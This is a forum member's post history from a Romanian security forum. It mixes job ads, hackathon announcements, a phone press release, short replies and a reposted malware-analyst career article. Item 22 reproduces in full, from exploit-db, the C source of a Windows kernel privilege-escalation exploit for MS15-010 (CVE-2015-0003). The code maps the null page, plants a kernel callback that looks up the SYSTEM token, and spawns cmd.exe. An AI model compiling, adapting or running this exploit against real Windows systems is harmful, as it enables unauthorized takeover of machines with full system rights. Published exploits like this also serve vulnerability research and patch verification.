Nytro

Administrators
  • Posts: 18715
  • Days Won: 701

Everything posted by Nytro

  1. Whoever wants them, direct link, send me a PM.
  2. Alex Ionescu? I don't think he was ever on the forum. He was busy writing the kernel for ReactOS.
  3. Has anyone heard of sickness? What about Alex Ionescu?
  4. C++ Linux Developer Job
     We are actively looking for a C++ Linux Developer to work inside one of our clients' teams. As a Developer you will:
     - Develop and write the required code for specific applications
     - Collaborate with the other colleagues to ensure that the current suite of applications is meeting the clients' needs
     - Document code consistently throughout the development process
     - Respond promptly and professionally to bug reports
     - Review and repair legacy code
     - Keep the project tasks status updated
     - Report status periodically to the supervisors - by request
     - Train specific clients on the use of the application if required by the company
     - Conduct training for new programming staff if required by the company
     - Project and develop server modules for Linux systems
     - Project and develop cross-platform modules (Linux, Mac, Windows)
     - Create applications for the automation of testing modules
     - Get involved in the general architecture of the system
     - Integrate new modules into existing products (Linux & Mac)
     - Fix bugs, refactor existing products
     Anyone interested, send me a PM and I'll put you in touch with the employer.
  5. They probably have the source. You know, when the big-shot US government comes to Romania, it gets its ass kissed and is offered whatever it wants.
  6. "Why is someone smoking in half of the shots of the speakers in this piece? What's the connection to hacking, to cybercrime? Do they look more dangerous?" Why is the report "In Search of the Most Dangerous City on the Internet - Hackerville" a failure? - WORLDIT
  7. Passionate about programming? Join the first security-themed hackathon in Romania! Avira is rewarding the best security applications at a 24-hour programming marathon on 27 and 28 June at Connect Hub, Bucharest.
     What will you build? Applications that make browsing the Internet safe, namely ones that:
     • Protect the user's identity and privacy
     • Protect the user against the installation of unwanted applications (installer downloads, software package downloads that install other applications alongside the one requested)
     • Protect against phishing sites / phishing e-mails
     • Let children browse the Internet safely
     • Protect against malware-type Facebook applications (ones that post in your name without your consent, etc.)
     • Protect the information on the phone (photos, messages, passwords, etc.)
     • Monitor the Internet traffic recorded on the mobile phone
     • Provide secure mobile banking
     • Provide encryption of communications on mobile devices
     Any desktop application, mobile application, browser extension or web application is accepted, developed in any programming language (C, C++, .Net, C#, Java, PHP, Javascript, Python), that helps solve or identify one of the problems above, and not only those. Any other solution that helps Internet users feel safe while browsing, playing online, making online transactions or using online chat is also valid.
     About the event
     The event has a particular structure: for 24 hours, participants will sit in front of their computers, alone or in teams of up to 4 members, to build the most interesting security applications. Coffee, fruit and pizza will be available, as well as relaxation areas, and the atmosphere will be as relaxed as possible.
     Registration for the event is mandatory and is done through Eventbrite until 25 June 2015. Participation is free and is based on a prior preselection.
     About the prizes
     The prizes are offered by Avira and amount to 2000 euro for the 1st-place application, 700 euro for the 2nd-place application, and bean bags for every member of the 3rd-place team.
     Judging criteria
     Eliminatory: the application must work and it must be possible to demo it on request.
     Originality – how innovative is your idea? Has anyone developed it before?
     Usability – how useful is the application you built? How many people could use it?
     Scalability – how well does your application scale to a large number of users?
     Impact – what does your application change in the way users perceive Internet security?
     Popularity – how many votes from the other teams does your application have?
     The winner will be the solution that gathers the maximum number of points across all of the above criteria combined.
     Event schedule
     27 June, 10:00 - 10:30 – Event opening and networking. On 27 June, everyone admitted to the competition is expected at Connect Hub, Bulevardul Dacia 99, 3rd floor.
     27 June, 10:30 - 11:00 – Intro and presentation. The organizers will explain the concept of the event to the participants, introduce the jury members and the mentors, and answer the participants' questions.
     27 June, 11:00 – 12:00 – Mentoring sessions. For one hour, the board of judges and mentors will help participants define their ideas and form their teams.
     27 June, 12:00 – Start hacking. Contestants begin the development marathon, which will last 24 hours.
     27 June, 18:00 – First feedback session. During the Securithon there will be two feedback sessions, the first on day one at 18:00 and the second on day two at 9 in the morning. During these sessions, a selection of jury members and mentors will spend up to 10 minutes with each team to give them feedback on what they have built and to answer their questions.
     28 June, 12:00 – Stop hacking. On 28 June, Sunday, after 24 hours of development, the programming marathon closes; teams finish development and prepare their code to be uploaded to Github.
     28 June, 12:00-12:30 – Github time. All teams upload their code to Github, to a repository created by the organizers.
     12:30-13:00 – Open demos. For 30 minutes, teams can go to other teams, talk to the developers, see demos and vote for other teams' applications by placing sticky notes at the desks of the team they vote for.
     13:00 – Pitches start. At 13:00 the pitches begin; each team will have up to 3 minutes to present its application to the jury and the other participants, and 2 minutes for questions. At the end of the pitches, the board of judges and mentors will decide which applications win.
     Sign up now, places are limited!
     Event: http://www.eventbrite.com/e/securithon-sunt-asteptati-designeri-developeri-si-frontend-testeri-tickets-16694581944
     Link: Avira Securithon
  8. Indians. Nothing advanced.
  9. Nytro

    shit.

    Fixed! Bravo!
  10. Aka "Let's hire students, since we can't afford programmers"
  11. @saber05 - One or two, it depends. @ManutaDeAur - Come join us and the company pays.
  12. The ad is also on BestJobs if you don't want to send your CV by PM: IT Security Consultant (Penetration Tester) at S.C. KPMG ROMANIA SRL, BUCURESTI - BestJobs
  13. Allview presents the X2 Xtreme, its new flagship smartphone
     Aurelian Mihai - 9 Jun 2015
     The X2 Xtreme is a dual-SIM smartphone powered by the Helio X10 chipset (64-bit octa-core CPU at 2GHz), backed by 3GB of RAM. The device benefits from CorePilot 2.0 technology and runs Android 5.1 Lollipop. Its centerpiece, however, is the 64GB of internal memory, which can be expanded to 192GB by adding a microSD card of up to 128GB.
     "We continue to offer consumers products adapted to ever more diverse demands and expectations, through constant innovation and research. At the same time, we have kept the tradition of bringing to the Soul range a smartphone with extreme performance, considering the trends and the needs of users who want a smartphone with superlative specifications. Notable among these are: the 24 MP main camera, which through an image-stacking algorithm can deliver an incredible resolution that we are keeping as a surprise until the first reviews appear, storage of up to 192 GB that helps you capture 4K video, the 6" Quad HD display, the Helio X10 processor and more than 200 hours of talk time in Extreme mode," said Lucian Peticila, general manager of Visual Fan.
     The top of the Soul phone range includes fingerprint-based unlocking, offering an increased level of data protection. Besides unlocking the screen, the user can also use the fingerprint to encrypt files.
     The Allview X2 Xtreme offers two cameras, 8MP and 24MP; the main camera has a 6-layer lens (UV lens, focus lens, high precision lens, aperture, low dispersion lens) and scratch protection with a sapphire layer. Also notable is the LED flash with two tones of light - "warm" and "cold" - giving photos a natural look and a richer color palette. The phone can record video at 4K resolution and capture stills while filming using the button on the phone's frame. Alongside the camera, heading the spec list is the 6" screen with QHD resolution (2560x1440). Users can choose any of the X2 Xtreme's themes, or the Chameleon function, which adapts the phone's interface by duplicating the colors around you. The smartphone is equipped with a 3500 mAh battery that promises up to 20 hours of continuous operation or 350 hours on stand-by. The Allview X2 Xtreme is available starting today for pre-order, at a price of 2199 LEI.
     Source: Allview prezintă X2 Xtreme, noul său vârf de gamă smartphone
  14. I think it's fine to fill in something random if you don't have one. I think they'll pick the people (the 50) based on LinkedIn and GitHub too. I mean, if they're also interested in hiring, they probably want to pick "ok" people. Or at least end up with some contact details.
  15. WHAT THE HACK?! 12 HOURS, 20 CHALLENGES, 2500 EURO IN PRIZES AND ONLY 50 PARTICIPANTS.
     WHEN: 21 June 2015, starting at 10am
     WHERE: WELOVEDIGITAL, Bulevardul Dacia, nr. 30, Mecano building
     Places are limited. SIGN UP NOW.
     Link: http://whatthehack.net/
  16. The job's daily activities include design, development, maintenance and integration of business applications. C# will be the usual programming language, Visual Studio the development environment and Microsoft SQL Server the data storage engine.
     Responsibilities:
     - Building new systems with ASP.MVC, ASP.NET, SQL Server 2008/2012, EntityFramework and Linq
     - Developing new functionality on our existing software products
     - Leading/mentoring IT staff and sharing knowledge through knowledge-sharing presentations
     - Participating in a small, experienced, energetic development team.
     Requirements:
     - Solid knowledge of C# and .NET Framework, OOP concepts, algorithms and data structures – minimum 4 years of experience
     - Web development experience (ASP.MVC, ASP.NET, JavaScript, AJAX, CSS, JSON, jQuery) – minimum 4 years of experience
     - Very good knowledge of T-SQL and relational database design – minimum 4 years of experience
     - Graduate of Computer Science/Cybernetics/Information Technology/Electronics College
     - Fluent in English
     - Ability and willingness to work as part of a team of developers
     - Learning oriented person.
     Additional advantage:
     - Active Reports, SQL Reporting Services
     - Java & Install Shield knowledge
     - Active Directory knowledge
     - Knowledge of WCF Web Services, WCF Data Services
     For more information or to apply, send me a PM.
  17. Unfortunately remote work is not possible. I'm waiting for the CVs of anyone interested. I guarantee you'll like the projects.
  18. Find someone and share a two-room apartment. That would come to 150 euro per person in a decent apartment, in a decent area. And the utilities and expenses would be split in two. You should manage.
  19. Rent is the main cost; it depends on the area and the number of rooms. Studios - 200-250 euro, 2 rooms - 250-350 euro. Compared to living with your parents there are also: utilities, electricity, Internet... If you live with someone, the costs are split. And food and drink, going out etc. depend on each person.
  20. So You Want To Be A Malware Analyst
     September 18, 2012 | BY Adam Kujawa

     In war, there are always two sides: the attackers and the defenders. A less focused-on group is the researchers and developers. While soldiers are fighting a war on the front lines, scientists and engineers are researching and developing new weapons, defenses and tools; things that give their side an advantage. If one of these creations is ever captured by the opposing forces, it is reverse engineered to understand exactly how it works, how it can be defended against and even how to re-purpose it. The same goes for war on the cyber front: malicious attackers and system administrators (Black and White Hats) are the soldiers, malware authors develop new and dangerous forms of malware, and Malware Analysts reverse engineer these weapons to find out how to stop them.

     What is a Malware Analyst?
     A Malware Analyst is a highly specialized reverse-engineer, programmer and detective. They accomplish their task by using various tools and expert-level knowledge to understand not only what a particular piece of malware can do but also how it does it. Becoming a Malware Analyst requires a large amount of focus and discipline as well as training and practice in the inner workings of computer systems, programming methodologies in multiple languages and a keen mind for solving puzzles and connecting the dots.
     You might consider becoming a Malware Analyst if you have a passion for computer security, enjoy solving puzzles and like the prospect of always learning new things. You might also enjoy it if you prefer a profession that always poses a challenge or if you look forward to working on new and interesting things. No day is ever the same as the previous; every day is an opportunity to learn something new and fine-tune your skills. In addition to the personal satisfaction you would get from being a Malware Analyst, you would also become a samurai in the fight to make the cyber world a safer place.
     The type of person who would be perfect for becoming a Malware Analyst would be:
     - A fast learner
     - Able to derive meaning from nonsense
     - A good puzzle solver
     - Able to think outside of the box
     - Willing to frequently use the scientific method
     - Resourceful

     Prerequisites
     Prior to walking the path to become a Malware Analyst, a person should be familiar with:
     - Operating System Concepts
     - High Level & Low Level Programming (familiarity is fine, working knowledge not required at first)
     - Fundamentals of networking
     - How to use the internet to perform research

     Building the basics
     Being a Malware Analyst can take you many different places during your career and you can end up analyzing all types of malware, from normal application malware to exploits hidden in PDF files or malware found on smart phones. So where should you start when it comes to your training? You should master a few basics before trying anything too advanced:

     Learn Assembly Language
     In the hierarchy of programming languages, you have at the very top scripting languages like Perl or Python, followed by high and middle level languages like C++ and C, followed down by Assembly language, machine language and finally binary code, which is read by the hardware. Most malware is written in a middle-level language and once the code is completed, it is compiled all the way down so it can be read by the hardware and/or operating system. At this level, the code is not "human readable" or easily read by human eyes. In order for a Malware Analyst to be able to read the malware code, they will need to disassemble it. Unfortunately, the highest language derived from binary code is Assembly, which is the last level of human readable code. Therefore, it is imperative that a would-be Malware Analyst also learn how to read and write Assembly code.
     Assembly language is low-level and therefore involves many more instructions than you would see in a higher-level program. For example, the code required to print something in the console in a higher-level language is usually just one line and sometimes just one symbol. In Assembly, this simple procedure may require anywhere from 5 to 20 lines of code.
     Analyst's Tip: Learning Assembly is easy if you already know a higher-level language; imagine what the operating system needs to do in order for a single function call to execute, and this is what you will see in Assembly. By learning shortcuts to parsing Assembly, you will find what you are looking for much faster.

     Learn how to use the tools
     As a construction worker needs to know how to use a hammer and a mechanic needs to know how to use a wrench, a Malware Analyst needs to know how to work their own set of unique and powerful tools. Some tools are easy to use and some are not; some have clear output and some dump you with lots of data that you need to be able to parse. The tools of a Malware Analyst are incredibly important and usually one of the first things learned. Here is a list of the types of tools required and some examples of them:
     - Disassembler – IDA Pro
     - Debugger – OllyDbg, WinDbg
     - System Monitor – Process Monitor, RegShot, Process Explorer
     - Network Monitor – TCP View, Wireshark
     - Packer Identifier – PEID
     - Unpacking Tools – Qunpack, GUNPacker
     - Binary Analysis Tools – PE Explorer, Malcode Analysts Pack
     - Code Analysis Tools – LordPE, ImpRec
     Once you learn how the tools work and what you could do with them, your quest in analyzing malware will become easier and easier. Also, keep in mind that while you might originally learn how to use a specific suite of tools, new tools are being developed all the time that might be more helpful in both their design and function.

     Learn about malware
     Learning about malware might seem a bit redundant when you are training to become a Malware Analyst; however, it is a very important aspect of your training. Malware evolves and changes every year; it uses new methods to infect as well as operate and sometimes brings back old methods if they are applicable again. If you were writing a program to play Tic-Tac-Toe, you could try to write it from scratch, or you could see how other people have written it before and get an idea of what you need to do. The same applies to malware analysis; reading white papers and analysis reports about different types of malware will give you an idea of what you might be seeing while reversing. Process injection is a method that malware uses to hide its operations; it must go through a set of functions in order to perform this technique and it is important that you be able to identify it happening in the code based upon prior experience and knowledge about how malware works. Research, practice, knowledge and experience are key to being able to effectively analyze new malware and should be the staples of your Malware Analyst training.

     Helpful Links and Sources
     There are many different ways to learn about becoming a Malware Analyst; some people choose to go through courses taught online or in person, which can cost upwards of a few thousand dollars. Other people choose to learn as they go, picking up information where they can and learning from their own experience. Both are decent ways of learning about malware analysis, but the cheap and easy way would be through doing online research and reading lots of books. Here is a list of my favorite sources for learning about malware analysis:
     Online Sources:
     - Tuts4You.com Tutorials
     - Sans.org and anything by Lenny Zeltser
     - Google Searches for "Malware Analysis <specific topic>"
     Books:
     - Malware Analyst's Cookbook
     - Rootkits: Subverting the Windows Kernel
     - Practical Malware Analysis
     - The IDA Pro Book
     - Reversing: Secrets of Reverse Engineering

     Conclusion
     Whether it is to start a new career or just simple curiosity, learning about Malware Analysis can be a very challenging and rewarding path. It can test your patience, concentration and sometimes even your temper, but the payoff when you have been working on a file for hours and finally come across the key function or piece of data you were looking for cannot be duplicated by anything else. The future holds a war between those who use malware and those who fight against it and, as technology advances, so too do the methods in which malware authors write programs to exploit and control it. The next generation of malware fighters will require a more advanced knowledge than ever before; they will be the cyber samurai.
     Source: https://blog.malwarebytes.org/intelligence/2012/09/so-you-want-to-be-a-malware-analyst/
  21. IT Security Consultant (Penetration Tester/ Ethical Hacker)
     Job profile:
     Conducting technical security assessments and information security projects which require expertise in one or more of the following areas: Penetration Testing / Ethical Hacking, Vulnerability Assessments and IT Security Audits. Identifying and exploiting technical vulnerabilities in clients' systems, assessing the business risks of the technical vulnerabilities and communicating these to the client. Performing security configuration analysis for various operating systems, especially Windows and Linux / UNIX. The successful candidate will have the ability to learn quickly and work with new technologies, tools and techniques.
     Some typical projects that you will work on (depending on your expertise) could be:
     - Web application penetration testing: trying to find vulnerabilities in web applications (e.g. Internet Banking, eCommerce websites, web portals, etc.) and reporting them to clients. Trying to exploit these vulnerabilities to assess their impact on the business.
     - Internal network penetration testing: simulating a malicious person who already has access to the internal network of the customer (e.g. a visitor, consultant, etc.). Starting only from a simple network port access you will have to gain access to sensitive information from the client's internal network, gain Domain Admin access or reach other flags.
     - Mobile application penetration testing: trying to find vulnerabilities in mobile applications (Android, iOS, and Windows Phone) and suggesting corrective measures to improve their security.
     You may also be involved in other types of technical project that will involve your imagination and out-of-the-box thinking, as well as giving demonstrations and presentations to clients. We encourage technical research and presentation of our results at local and international hacking conferences.
     Specific requirements
     Since IT Security is a multidisciplinary field, we are looking for a person who has a broader understanding of technical concepts from one or more of the following areas: web applications, system administration, networking, software development. We expect you to be familiar with OWASP Top 10, HTTP protocol, SSL, SQL, JavaScript, buffer overflow, TCP/IP, DNS, wireshark, nmap, Linux shell commands, Kali and others. You must also be able to express your findings in very good technical and business English (oral and written).
     Further requirements:
     - Bachelor's degree in an IT related field.
     - Hands-on experience in at least one of the following: security testing, web application development/testing, system administration, networking, software development.
     - Ability to work effectively either individually or as a member of a multi-skilled team.
     - Professional discipline, accuracy, reliability and excellent analytical skills.
     - Strong interpersonal skills, team spirit, resilience, flexibility, adaptability and self-motivation.
     Certifications such as OSCP, OSCE, CEH, LPT, CCNA, MCSE will be considered an advantage.
     Our Offer
     - A competitive salary and benefits package.
     - The chance to develop a rewarding professional path and work on challenging assignments.
     - Support for professional qualifications and personal development through a strong mentoring program.
     - Work in a friendly team of security professionals who enjoy sharing their experience with colleagues.
     - The opportunity to participate in a wide variety of technical projects and client environments.
     - Flexible working program.
     Note: If you are interested, send me your CV via PM.
  22. Microsoft Windows - Local Privilege Escalation (MS15-010)

     // ex.cpp
     /*
     Windows XP/2K3/VISTA/2K8/7 WM_SYSTIMER Kernel EoP
     CVE-2015-0003
     March 2015 (Public Release: May 24, 2015)
     Tested on:
     x86: Win 7 SP1 | Win 2k3 SP2 | Win XP SP3
     x64: Win 2k8 SP1 | Win 2k8 R2 SP1
     Author: Skylake - skylake <at> mail <dot> com
     */
     #include "ex.h"

     _ZwAllocateVirtualMemory ZwAllocateVirtualMemory;
     _PsLookupProcessByProcessId PsLookupProcessByProcessId;
     _PsReferencePrimaryToken PsReferencePrimaryToken;
     DWORD Pid;
     ATOM atom;
     BOOL KrnlMode, bSpawned;

     DWORD_PTR WINAPI pti()
     {
     #ifdef _M_X64
         LPBYTE p = ( LPBYTE ) __readgsqword( 0x30 );
         return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x78 ) );
     #else
         LPBYTE p = ( LPBYTE ) __readfsdword( 0x18 );
         return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x40 ) );
     #endif
     }

     BOOL find_and_replace_member( PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize )
     {
         DWORD_PTR dwIndex, dwMask;
     #ifdef _M_X64
         dwMask = ~0xf;
     #else
         dwMask = ~7;
     #endif
         // dwCurrentValue &= dwMask;
         for( dwIndex = 0; dwIndex < dwMaxSize; dwIndex++ )
         {
             if( ( pdwStructure[dwIndex] & dwMask ) == dwCurrentValue )
             {
                 // pdwStructure[dwIndex] = dwNewValue;
                 return TRUE;
             }
         }
         return FALSE;
     }

     BOOL WINAPI Init()
     {
         HMODULE hMod = NULL;
         PVOID Base = NULL;
         OSVERSIONINFO ov = { sizeof( OSVERSIONINFO ) };
         PSYSTEM_MODULE_INFORMATION pm = NULL;
         BOOL RetVal = FALSE;
         __try
         {
             if( !GetVersionEx( &ov ) ) __leave;
             if( ov.dwMajorVersion == 5 && ov.dwMinorVersion > 0 )
             {
                 atom = 0xc039;
             }
             else if( ov.dwMajorVersion == 6 && ov.dwMinorVersion < 2 )
             {
                 atom = ( ov.dwMinorVersion == 1 ) ? 0xc03c : 0xc03a;
             }
             if( !atom ) __leave;
             _ZwQuerySystemInformation ZwQuerySystemInformation = ( _ZwQuerySystemInformation ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwQuerySystemInformation" );
             if( !ZwQuerySystemInformation ) __leave;
             ZwAllocateVirtualMemory = ( _ZwAllocateVirtualMemory ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwAllocateVirtualMemory" );
             if( !ZwAllocateVirtualMemory ) __leave;
             ULONG len;
             LONG status = ZwQuerySystemInformation( SystemModuleInformation, NULL, 0, &len );
             if( !status ) __leave;
             pm = ( PSYSTEM_MODULE_INFORMATION ) LocalAlloc( LMEM_ZEROINIT, len );
             if( !pm ) __leave;
             status = ZwQuerySystemInformation( SystemModuleInformation, pm, len, &len );
             if( status ) __leave;
             CHAR szKrnl[MAX_PATH] = { 0 }, *t;
             for( ULONG i = 0; i < pm->Count; ++i )
             {
                 if( strstr( pm->Module[i].ImageName, "exe" ) )
                 {
                     t = strstr( pm->Module[i].ImageName, "nt" );
                     if( t )
                     {
                         strcpy_s( szKrnl, _countof( szKrnl ) - 1, t );
                         Base = pm->Module[i].Base;
                         break;
                     }
                 }
             }
             hMod = LoadLibraryA( szKrnl );
             if( !hMod || !Base ) __leave;
             PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) GetProcAddress( hMod, "PsLookupProcessByProcessId" );
             if( !PsLookupProcessByProcessId ) __leave;
             PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsLookupProcessByProcessId - ( DWORD_PTR ) hMod ) );
             PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) GetProcAddress( hMod, "PsReferencePrimaryToken" );
             if( !PsReferencePrimaryToken ) __leave;
             PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsReferencePrimaryToken - ( DWORD_PTR ) hMod ) );
             Pid = GetCurrentProcessId();
             RetVal = TRUE;
         }
         __finally
         {
             if( pm ) LocalFree( pm );
             if( hMod ) FreeLibrary( hMod );
         }
         return RetVal;
     }

     LRESULT CALLBACK ShellCode( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam )
     {
         LPVOID pCurProcess = NULL;
         LPVOID pSystemInfo = NULL;
         PACCESS_TOKEN systemToken;
         PACCESS_TOKEN targetToken;
         PsLookupProcessByProcessId( ( HANDLE ) Pid, &pCurProcess );
         PsLookupProcessByProcessId( ( HANDLE ) 4, &pSystemInfo );
         targetToken = PsReferencePrimaryToken( pCurProcess );
         systemToken = PsReferencePrimaryToken( pSystemInfo );
         // find_and_replace_member( ( PDWORD_PTR ) pCurProcess, ( DWORD_PTR ) targetToken, ( DWORD_PTR ) systemToken, 0x200 );
         KrnlMode = TRUE;
         return 0;
     }

     VOID WINAPI leave()
     {
         keybd_event( VK_ESCAPE, 0, 0, NULL );
         keybd_event( VK_ESCAPE, 0, KEYEVENTF_KEYUP, NULL );
         keybd_event( VK_LWIN, 0, KEYEVENTF_KEYUP, NULL );
     }

     LRESULT CALLBACK WndProc( HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam )
     {
         if( bSpawned )
         {
             leave();
             ExitProcess( 0 );
         }
         switch( message )
         {
         case WM_CREATE:
             SetTimer( hWnd, ID_TIMER, 1000 * 3, NULL );
             FlashWindow( hWnd, TRUE );
             keybd_event( VK_LWIN, 0, 0, NULL );
             break;
         case WM_CLOSE:
             DestroyWindow( hWnd );
             break;
         case WM_DESTROY:
             PostQuitMessage( 0 );
             break;
         case WM_TIMER:
             KillTimer( hWnd, ID_TIMER );
             leave();
             DestroyWindow( hWnd );
             break;
         default:
             return DefWindowProc( hWnd, message, wParam, lParam );
         }
         return 0;
     }

     int APIENTRY _tWinMain( _In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPTSTR lpCmdLine, _In_ int nCmdShow )
     {
         WNDCLASSEX wc = { sizeof( WNDCLASSEX ) };
         HWND hWnd = NULL;
         MSG Msg = { 0 };
         SIZE_T size = 0x1000;
         LPVOID addr = ( LPVOID ) 1;
         if( !Init() ) return 1;
         if( ZwAllocateVirtualMemory( ( HANDLE ) -1, &addr, 0, &size, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ) )
         {
             // return 1;
         }
         DWORD_PTR p = pti();
         if( !p ) return 1;
     #ifdef _M_X64
         *( ( PDWORD_PTR ) 0x10 ) = p;
         *( ( LPBYTE ) 0x2a ) = 4;
         *( ( LPVOID* ) 0x90 ) = ( LPVOID ) ShellCode;
         *( ( PDWORD_PTR ) 0xa8 ) = 0x400;
         *( ( LPDWORD ) 0x404 ) = 1;
         *( ( PDWORD_PTR ) 0x408 ) = 0x800;
         *( ( LPWORD ) 0x410 ) = atom;
         *( ( LPBYTE ) 0x412 ) = 1;
     #else
         *( ( LPDWORD ) 0x08 ) = p;
         *( ( LPBYTE ) 0x16 ) = 4;
         *( ( LPVOID* ) 0x60 ) = ( LPVOID ) ShellCode;
         *( ( LPDWORD ) 0x6c ) = 0x400;
         *( ( LPDWORD ) 0x404 ) = 1;
         *( ( LPDWORD ) 0x408 ) = 0x800;
         *( ( LPWORD ) 0x40c ) = atom;
         *( ( LPBYTE ) 0x40e ) = 1;
     #endif
         wc.lpfnWndProc = WndProc;
         wc.hInstance = hInstance;
         wc.lpszClassName = TEXT( "Class" );
         if( !RegisterClassEx( &wc ) ) return 1;
         hWnd = CreateWindowEx( WS_EX_CLIENTEDGE, TEXT( "Class" ), TEXT( "Window" ), WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 200, 100, NULL, NULL, hInstance, NULL );
         if( !hWnd ) return 1;
         ShowWindow( hWnd, SW_HIDE );
         UpdateWindow( hWnd );
         while( GetMessage( &Msg, NULL, 0, 0 ) )
         {
             if ( Msg.message == WM_SYSTIMER ) // Borrowed from http://blog.beyondtrust.com/fuzzing-for-ms15-010
             {
                 if( !KrnlMode )
                 {
                     Msg.hwnd = ( HWND ) NULL;
                 }
                 else
                 {
                     Msg.hwnd = hWnd;
                     if( !bSpawned )
                     {
                         ShellExecute( NULL, TEXT( "open" ), TEXT( "cmd.exe" ), NULL, NULL, SW_SHOW );
                         bSpawned = TRUE;
                     }
                 }
             }
             TranslateMessage( &Msg );
             DispatchMessage( &Msg );
         }
         return ( int ) Msg.wParam;
     }
     // EOF

     // ex.h
     #pragma once
     #include <windows.h>
     #include <stdio.h>
     #include <tchar.h>

     typedef NTSTATUS ( WINAPI *_ZwAllocateVirtualMemory ) ( _In_ HANDLE ProcessHandle, _Inout_ PVOID *BaseAddress, _In_ ULONG_PTR ZeroBits, _Inout_ PSIZE_T RegionSize, _In_ ULONG AllocationType, _In_ ULONG Protect );
     typedef NTSTATUS ( WINAPI *_PsLookupProcessByProcessId ) ( _In_ HANDLE ProcessId, _Out_ PVOID *Process );
     typedef PACCESS_TOKEN ( WINAPI *_PsReferencePrimaryToken ) ( _Inout_ PVOID Process );

     typedef enum _SYSTEM_INFORMATION_CLASS
     {
         SystemBasicInformation = 0,
         SystemModuleInformation = 11
     } SYSTEM_INFORMATION_CLASS;

     typedef NTSTATUS ( WINAPI *_ZwQuerySystemInformation ) ( _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass, _Inout_ PVOID SystemInformation, _In_ ULONG SystemInformationLength, _Out_opt_ PULONG ReturnLength );

     typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY
     {
         HANDLE Section;
         PVOID MappedBase;
         PVOID Base;
         ULONG Size;
         ULONG Flags;
         USHORT LoadOrderIndex;
         USHORT InitOrderIndex;
         USHORT LoadCount;
         USHORT PathLength;
         CHAR ImageName[256];
     } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

     typedef struct _SYSTEM_MODULE_INFORMATION
     {
         ULONG Count;
         SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
     } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

     #define ID_TIMER 0x1
     #define WM_SYSTIMER 0x118
     // EOF

     Source: https://www.exploit-db.com/exploits/37098/
  23. That sucks. There was a migration option from vBulletin.